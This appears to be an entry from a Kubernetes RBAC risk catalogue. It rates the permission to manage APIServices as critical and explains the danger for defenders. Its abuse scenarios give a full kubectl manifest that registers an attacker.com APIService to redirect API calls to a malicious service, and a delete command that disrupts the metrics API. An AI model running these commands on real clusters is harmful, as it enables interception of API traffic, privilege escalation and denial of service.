Overview

FieldValue
ID1046
NameManage APIServices
Risk CategoryTampering
Risk LevelCritical
Role TypeClusterRole
API Groupsapiregistration.k8s.io
Resourcesapiservices
Risky Verb Combinations[create] · [update] · [patch] · [delete]
TagsAPIServiceManipulation DenialOfService InformationDisclosure PrivilegeEscalation Tampering

Description

Grants control over APIServices, which register aggregated API servers. This is highly critical as an attacker can redirect API requests to a malicious server, intercept traffic, escalate privileges, cause denial of service, or exfiltrate information.

Abuse Scenarios

  1. Create a new APIService to redirect API calls to a malicious server.
kubectl create -f - <<EOF
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  name: v1alpha1.attacker.com
spec:
  service:
    name: <malicious-service-name>
    namespace: <malicious-service-namespace>
  group: attacker.com
  version: v1alpha1
  caBundle: <base64-encoded-ca-cert> # CA for the malicious service
  groupPriorityMinimum: 2000 # Higher than core APIs
  versionPriority: 200
EOF
# Example: kubectl create -f - <<EOF ... EOF
  1. Delete an existing APIService, disrupting aggregated API functionality.
kubectl delete apiservice <apiservice-name>
# Example: kubectl delete apiservice v1beta1.metrics.k8s.io